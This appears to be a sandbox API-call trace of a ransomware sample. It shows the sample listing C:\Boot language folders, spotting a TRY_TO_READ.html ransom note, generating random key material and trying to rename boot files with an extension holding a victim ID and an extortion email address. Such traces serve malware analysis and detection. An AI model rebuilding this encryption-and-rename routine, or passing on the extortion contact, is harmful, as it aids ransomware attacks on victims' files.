	[0052.003] CreateFileW (lpFileName="C:\\\\Boot\\Fonts\\chs_boot.ttf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\fonts\\chs_boot.ttf.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0052.003] GetProcessHeap () returned 0x540000
	[0052.003] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5832a8 | out: hHeap=0x540000) returned 1
	[0052.003] CloseHandle (hObject=0xffffffff) returned 0
	[0052.003] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0052.003] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0052.003] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0052.003] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0052.003] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5440 | out: hHeap=0x540000) returned 1
	[0052.003] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5468 | out: hHeap=0x540000) returned 1
	[0052.003] FindFirstFileW (in: lpFileName="C:\\\\Boot\\fr-FR\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc9c8a490, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c8a490, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x575360
	[0052.003] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.003] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.003] GetLastError () returned 0x6
	[0052.004] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0052.004] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0052.004] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0052.004] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5440
	[0052.004] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x5753a0
	[0052.004] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5753a0 | out: hHeap=0x540000) returned 1
	[0052.004] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0052.004] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0052.004] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5440 | out: hHeap=0x540000) returned 1
	[0052.004] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0052.004] FindNextFileW (in: hFindFile=0x575360, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc9c8a490, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c8a490, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0052.005] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.005] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.005] GetLastError () returned 0x6
	[0052.005] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0052.005] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0052.005] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0052.005] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5440
	[0052.005] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x5753a0
	[0052.005] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5753a0 | out: hHeap=0x540000) returned 1
	[0052.005] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0052.006] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0052.006] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5440 | out: hHeap=0x540000) returned 1
	[0052.006] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0052.006] FindNextFileW (in: hFindFile=0x575360, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1
	[0052.006] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.006] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.006] GetLastError () returned 0x6
	[0052.006] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5440
	[0052.006] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0052.006] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0052.006] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0052.006] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0052.006] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5440 | out: hHeap=0x540000) returned 1
	[0052.006] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0052.006] FindNextFileW (in: hFindFile=0x575360, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9c8a490, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9c8a490, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c8a490, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0052.006] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.006] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.006] GetLastError () returned 0x6
	[0052.006] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0052.006] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583b10
	[0052.006] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0052.006] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0052.006] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583b10 | out: hHeap=0x540000) returned 1
	[0052.006] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0052.006] FindNextFileW (in: hFindFile=0x575360, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9c8a490, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9c8a490, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c8a490, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0052.006] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0052.006] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b6db0
	[0052.006] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596660
	[0052.006] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b6db0 | out: pbBuffer=0x5b6db0) returned 1
	[0052.006] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596660 | out: pbBuffer=0x596660) returned 1
	[0052.006] SetFileAttributesW (lpFileName="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0
	[0052.007] lstrlenW (lpString="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui") returned 30
	[0052.007] GetProcessHeap () returned 0x540000
	[0052.007] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa2) returned 0x5919d0
	[0052.007] lstrcpyW (in: lpString1=0x5919d0, lpString2="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui") returned="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui"
	[0052.007] lstrcatW (in: lpString1="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR"
	[0052.007] MoveFileExW (lpExistingFileName="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0
	[0052.007] CreateFileW (lpFileName="C:\\\\Boot\\fr-FR\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0052.007] GetProcessHeap () returned 0x540000
	[0052.007] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0052.007] CloseHandle (hObject=0xffffffff) returned 0
	[0052.007] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0052.007] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0052.007] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0052.007] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0052.007] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5490 | out: hHeap=0x540000) returned 1
	[0052.007] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a54b8 | out: hHeap=0x540000) returned 1
	[0052.007] FindFirstFileW (in: lpFileName="C:\\\\Boot\\hu-HU\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc9c8a490, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c8a490, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5753a0
	[0052.008] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.008] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.008] GetLastError () returned 0x6
	[0052.008] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0052.008] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0052.008] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0052.008] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5490
	[0052.008] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x5753e0
	[0052.008] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5753e0 | out: hHeap=0x540000) returned 1
	[0052.008] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0052.008] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0052.008] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5490 | out: hHeap=0x540000) returned 1
	[0052.008] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0052.008] FindNextFileW (in: hFindFile=0x5753a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc9c8a490, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c8a490, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0052.008] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.008] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.008] GetLastError () returned 0x6
	[0052.008] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0052.008] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0052.008] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0052.008] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5490
	[0052.008] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x5753e0
	[0052.008] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5753e0 | out: hHeap=0x540000) returned 1
	[0052.008] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0052.008] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0052.008] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5490 | out: hHeap=0x540000) returned 1
	[0052.008] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0052.008] FindNextFileW (in: hFindFile=0x5753a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1
	[0052.008] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.008] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.008] GetLastError () returned 0x6
	[0052.008] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5490
	[0052.008] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0052.009] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0052.009] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0052.009] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0052.009] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5490 | out: hHeap=0x540000) returned 1
	[0052.009] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0052.009] FindNextFileW (in: hFindFile=0x5753a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9c8a490, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9c8a490, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c8a490, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0052.009] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.009] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.009] GetLastError () returned 0x6
	[0052.009] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0052.009] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583b10
	[0052.009] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0052.009] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0052.009] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583b10 | out: hHeap=0x540000) returned 1
	[0052.009] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0052.009] FindNextFileW (in: hFindFile=0x5753a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9c8a490, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9c8a490, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c8a490, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0052.009] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0052.009] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b6eb8
	[0052.009] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596670
	[0052.009] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b6eb8 | out: pbBuffer=0x5b6eb8) returned 1
	[0052.009] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596670 | out: pbBuffer=0x596670) returned 1
	[0052.009] SetFileAttributesW (lpFileName="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0
	[0052.009] lstrlenW (lpString="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui") returned 30
	[0052.009] GetProcessHeap () returned 0x540000
	[0052.009] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa2) returned 0x5919d0
	[0052.009] lstrcpyW (in: lpString1=0x5919d0, lpString2="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui") returned="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui"
	[0052.009] lstrcatW (in: lpString1="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR"
	[0052.009] MoveFileExW (lpExistingFileName="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0
	[0052.010] CreateFileW (lpFileName="C:\\\\Boot\\hu-HU\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0052.010] GetProcessHeap () returned 0x540000
	[0052.010] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0052.010] CloseHandle (hObject=0xffffffff) returned 0
	[0052.010] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0052.010] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0052.010] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0052.010] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0052.010] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a54e0 | out: hHeap=0x540000) returned 1
	[0052.010] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5508 | out: hHeap=0x540000) returned 1
	[0052.010] FindFirstFileW (in: lpFileName="C:\\\\Boot\\it-IT\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc9c8a490, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c8a490, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5753e0
	[0052.010] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.010] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.010] GetLastError () returned 0x6
	[0052.010] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0052.010] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0052.010] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0052.010] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a54e0
	[0052.010] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x575420
	[0052.010] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x575420 | out: hHeap=0x540000) returned 1
	[0052.010] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0052.010] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0052.010] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a54e0 | out: hHeap=0x540000) returned 1
	[0052.010] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0052.010] FindNextFileW (in: hFindFile=0x5753e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc9c8a490, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c8a490, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0052.011] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0052.011] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0052.011] GetLastError () returned 0x6
	[0052.011] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0052.011] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0052.011] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0052.011] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a54e0
	[0052.011] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x575420
	[0052.011] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x575420 | out: hHeap=0x540000) returned 1
	[0052.011] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0052.011] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0052.011] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a54e0 | out: hHeap=0x540000) returned 1
	[0052.011] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
